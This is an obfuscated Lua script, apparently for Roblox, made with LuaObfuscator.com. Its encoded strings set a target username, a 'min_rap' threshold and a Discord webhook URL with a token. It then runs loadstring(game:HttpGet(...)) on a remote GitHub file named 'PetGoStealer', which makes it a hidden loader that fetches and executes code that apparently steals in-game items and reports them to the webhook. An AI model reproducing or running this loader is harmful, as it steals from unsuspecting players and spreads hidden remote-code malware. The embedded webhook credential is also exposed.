--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v86=v2(v0(v30,16));if v19 then local v109=v5(v86,v19);v19=nil;return v109;else return v86;end end end);local function v20(v31,v32,v33) if v33 then local v87=(v31/(2^(v32-(2 -1))))%(((1 + 4) -3)^(((v33-1) -(v32-(1 -0))) + (2 -1))) ;return v87-(v87%(620 -(555 + 64))) ;else local v88=(933 -(857 + 19 + 55))^(v32-(569 -((1244 -(282 + 595)) + 201))) ;return (((v31%(v88 + v88))>=v88) and (928 -(214 + 713))) or 0 ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=1637 -(1523 + 114) ;local v36;local v37;while true do if (v35==(1 + 0)) then return (v37 * (364 -108)) + v36 ;end if (v35==((1182 -(32 + 85)) -(68 + 997))) then v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (1272 -(226 + 1044)) ;v35=4 -3 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 1 + 2 );v18=v18 + (961 -(892 + 65)) ;return (v41 * (40022563 -23245347)) + (v40 * 65536) + (v39 * 256) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1 -0 ;local v45=(v20(v43,1 -0 ,20) * ((352 -(87 + 263))^32)) + v42 ;local v46=v20(v43,201 -((118 -51) + 113) ,23 + 8 );local v47=((v20(v43,78 -46 )==(1 + 0)) and  -(3 -2)) or (953 -(802 + 150)) ;if (v46==0) then if (v45==0) then return v47 * ((0 -0) -0) ;else v46=1 -(0 + 0) ;v44=0;end elseif (v46==(1490 + 557)) then return ((v45==((2180 -1183) -(915 + 82))) and (v47 * ((2 -1)/(0 + (791 -(368 + 423)))))) or (v47 * NaN) ;end return v8(v47,v46-((234 + 1110) -321) ) * (v44 + (v45/((1189 -(1069 + 118))^52))) ;end local function v25(v48) local v49;if  not v48 then local v89=(430 -(44 + 386)) -0 ;while true do if (v89==(18 -(10 + (1494 -(998 + 488))))) then v48=v23();if (v48==(0 -(0 + 0))) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(443 -(416 + 26)) );v18=v18 + v48 ;local v50={};for v66=439 -(145 + 240 + 53) , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v90,v91,v92,v93,v94,v95,v96,v97) local v90=(function() return 0;end)();local v91=(function() return;end)();local v93=(function() return;end)();while true do if (v90==(0 + 0)) then local v114=(function() return 0 -0 ;end)();local v115=(function() return;end)();while true do if (v114==0) then v115=(function() return 698 -(208 + 490) ;end)();while true do if (v115==(1 + 0)) then v90=(function() return  #"!";end)();break;end if ((0 + 0)==v115) then v91=(function() return v92();end)();v93=(function() return nil;end)();v115=(function() return 1;end)();end end break;end end end if (v90~= #" ") then else if (v91== #"!") then v93=(function() return v92()~=(836 -(660 + 176)) ;end)();elseif (v91==(1 + 1)) then v93=(function() return v94();end)();elseif (v91~= #"asd") then else v93=(function() return v95();end)();end v96[v97]=(function() return v93;end)();break;end end return v90,v91,v92,v93,v94,v95,v96,v97;end;end)();local v52=(function() return function(v98,v99,v100) local v101=(function() return 0;end)();while true do if (v101==0) then v98[v99-#">" ]=(function() return v100();end)();return v98,v99,v100;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #">",v57 do FlatIdent_475BC,Type,v21,Cons,v24,v25,v58,v68=(function() return v51(FlatIdent_475BC,Type,v21,Cons,v24,v25,v58,v68);end)();end v56[ #"19("]=(function() return v21();end)();for v69= #"\\",v23() do local v70=(function() return v21();end)();if (v20(v70, #",", #"[")~=(1636 -(1373 + 263))) then else local v104=(function() return 0 + 0 ;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();while true do if (v104==0) then local v120=(function() return 202 -(14 + 188) ;end)();while true do if ((676 -(534 + 141))==v120) then v104=(function() return 1 + 0 ;end)();break;end if (v120~=(0 + 0)) then else local v122=(function() return 0 + 0 ;end)();while true do if (v122~=(1 -0)) then else v120=(function() return 1;end)();break;end if (v122==(0 -0)) then v105=(function() return 0 -0 ;end)();v106=(function() return nil;end)();v122=(function() return 1;end)();end end end end end if (v104==2) then while true do if (v105== #"<") then local v123=(function() return 0 -0 ;end)();local v124=(function() return;end)();while true do if (v123~=(0 + 0)) then else v124=(function() return 0 + 0 ;end)();while true do if ((0 + 0)~=v124) then else v108=(function() return {v22(),v22(),nil,nil};end)();if (v106==(396 -(115 + 281))) then local v173=(function() return 341 -(218 + 123) ;end)();local v174=(function() return;end)();while true do if (v173~=0) then else v174=(function() return 0 -0 ;end)();while true do if ((0 + 0)~=v174) then else v108[ #"91("]=(function() return v22();end)();v108[ #".dev"]=(function() return v22();end)();break;end end break;end end elseif (v106== #"{") then v108[ #"asd"]=(function() return v23();end)();elseif (v106==(4 -2)) then v108[ #"xxx"]=(function() return v23() -((7 -5)^(576 -(306 + 254))) ;end)();elseif (v106== #"-19") then local v186=(function() return 0 + 0 ;end)();local v187=(function() return;end)();while true do if (v186~=(867 -(550 + 317))) then else v187=(function() return 0;end)();while true do if (v187~=(0 -0)) then else v108[ #"91("]=(function() return v23() -((2 -0)^(44 -28)) ;end)();v108[ #".com"]=(function() return v22();end)();break;end end break;end end end v124=(function() return 286 -(134 + 151) ;end)();end if (v124==1) then v105=(function() return 2;end)();break;end end break;end end end if (v105== #"91(") then if (v20(v107, #"91(", #"xxx")== #"|") then v108[ #"xnxx"]=(function() return v58[v108[ #"asd1"]];end)();end v53[v69]=(function() return v108;end)();break;end if ((0 -0)==v105) then local v126=(function() return 603 -(268 + 335) ;end)();local v127=(function() return;end)();while true do if (0==v126) then v127=(function() return 0;end)();while true do if (v127==(290 -(60 + 230))) then v106=(function() return v20(v70,1667 -(970 + 695) , #"asd");end)();v107=(function() return v20(v70, #"?id=",6);end)();v127=(function() return 1 + 0 ;end)();end if (1~=v127) then else v105=(function() return  #"~";end)();break;end end break;end end end if (v105~=(3 -1)) then else local v128=(function() return 0;end)();local v129=(function() return;end)();while true do if (v128==(1990 -(582 + 1408))) then v129=(function() return 0 -0 ;end)();while true do if (v129~=(0 -0)) then else if (v20(v107, #"}", #"~")~= #".") then else v108[5 -3 ]=(function() return v58[v108[2]];end)();end if (v20(v107,2,2)== #"~") then v108[ #"asd"]=(function() return v58[v108[ #"xnx"]];end)();end v129=(function() return 1;end)();end if (v129~=(3 -2)) then else v105=(function() return  #"-19";end)();break;end end break;end end end end break;end if ((1825 -(1195 + 629))==v104) then local v121=(function() return 0 -0 ;end)();while true do if (v121~=(242 -(187 + 54))) then else v104=(function() return 782 -(162 + 618) ;end)();break;end if (v121==(1024 -(706 + 318))) then v107=(function() return nil;end)();v108=(function() return nil;end)();v121=(function() return 1252 -(721 + 530) ;end)();end end end end end end for v71= #"~",v23() do v54,v71,v28=(function() return v52(v54,v71,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1272 -(945 + (1277 -951)) ];local v64=v60[4 -2 ];local v65=v60[3];return function(...) local v72=v63;local v73=v64;local v74=v65;local v75=v27;local v76=1;local v77= -(1 + 0);local v78={};local v79={...};local v80=v12("#",...) -(1 + 0) ;local v81={};local v82={};for v102=1500 -(1408 + 92) ,v80 do if (v102>=v74) then v78[v102-v74 ]=v79[v102 + (1087 -(461 + 625)) ];else v82[v102]=v79[v102 + (1289 -(993 + 295)) ];end end local v83=(v80-v74) + 1 + 0 ;local v84;local v85;while true do local v103=1171 -(418 + 753) ;while true do if (((1 + 0)==v103) or (2654>=2996)) then if (v85<=8) then if (v85<=(1 + 2)) then if ((3978>2104) and (v85<=(1 + 0))) then if (v85>0) then v82[v84[1 + 1 ]]();else v62[v84[532 -(406 + 123) ]]=v82[v84[1771 -(1749 + 20) ]];end elseif (v85>2) then v82[v84[1 + 1 ]]=v62[v84[(2446 -(118 + 1003)) -(1249 + 73) ]];else v82[v84[(2 -1) + 1 ]]=v62[v84[3]];end elseif (v85<=5) then if ((2995>1541) and (v85==(1149 -(466 + (1056 -(142 + 235)))))) then do return;end else v62[v84[6 -3 ]]=v82[v84[5 -3 ]];end elseif (v85<=(27 -21)) then local v139=v84[2];local v140=v82[v84[1903 -(106 + 1794) ]];v82[v139 + 1 + 0 ]=v140;v82[v139]=v140[v84[2 + 2 ]];elseif (v85==(20 -13)) then local v163=v84[5 -3 ];v82[v163]=v82[v163](v13(v82,v163 + (115 -(1 + 3 + 110)) ,v77));else v82[v84[586 -(57 + 527) ]]();end elseif (v85<=12) then if (v85<=10) then if (v85==(1436 -(41 + 1386))) then v82[v84[105 -(17 + 86) ]]=v84[3 + 0 ];else local v146=v84[3 -1 ];local v147,v148=v75(v82[v146](v13(v82,v146 + (2 -1) ,v84[3])));v77=(v148 + v146) -(167 -(122 + 44)) ;local v149=0 -0 ;for v160=v146,v77 do v149=v149 + (3 -2) ;v82[v160]=v147[v149];end end elseif (v85>11) then local v150=v84[2 + 0 ];local v151=v82[v84[3]];v82[v150 + 1 + 0 ]=v151;v82[v150]=v151[v84[7 -3 ]];else v82[v84[(1044 -(553 + 424)) -((56 -26) + 35) ]]=v84[3 + 0 + 0 ]~=(1257 -(1043 + 214)) ;end elseif (v85<=(14 + 0)) then if ((3249>953) and (v85==((28 + 20) -35))) then v82[v84[1214 -(323 + 889) ]]=v84[(3 + 4) -4 ];else local v158=580 -(207 + 154 + 219) ;local v159;while true do if (v158==(320 -(53 + 267))) then v159=v84[2];v82[v159]=v82[v159](v13(v82,v159 + 1 ,v77));break;end end end elseif ((v85<=(4 + (23 -12))) or (3273>4573)) then do return;end elseif (v85>(429 -((41 -26) + 398))) then local v165=982 -(18 + 964) ;local v166;local v167;local v168;local v169;while true do if ((v165==(0 -(0 -0))) or (3151<1284)) then v166=v84[2 + 0 ];v167,v168=v75(v82[v166](v13(v82,v166 + 1 + 0 ,v84[2 + 1 ])));v165=1;end if (v165==(851 -(20 + 830))) then v77=(v168 + v166) -(1 + 0) ;v169=126 -(116 + 10) ;v165=1 + 1 ;end if (v165==(740 -(542 + (947 -751)))) then for v179=v166,v77 do local v180=0 -0 ;while true do if (v180==(0 + 0)) then v169=v169 + 1 ;v82[v179]=v167[v169];break;end end end break;end end else v82[v84[2 + 0 ]]=v84[2 + 1 ]~=(0 -(753 -(239 + 514))) ;end v76=v76 + (2 -1) ;break;end if ((v103==(1551 -(1126 + 425))) or (1850==1529)) then v84=v72[v76];v85=v84[406 -(118 + 287) ];v103=1;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3Q0003083Q00557365726E616D6503073Q004E4F4B4945593403073Q006D696E5F726170024Q0080842E4103073Q00776562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F2Q31333539303Q313239322Q332Q343938372F646F69465F55327A6B746D655F33764B61426E552D346550537167435A66626F416D34704438793630375049724E475A6D527046636763537A68325A424F732D4D736D57030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403473Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F507378536372697074792F456B7330766133312F6D61696E2F506574476F537465616C6572000F3Q00120D3Q00023Q0012053Q00013Q00120D3Q00043Q0012053Q00033Q00120D3Q00063Q0012053Q00053Q0012023Q00073Q001202000100083Q00200600010001000900120D0003000A4Q000B000400014Q000A000100044Q00075Q00022Q00083Q000100012Q00043Q00017Q00",v9(),...);
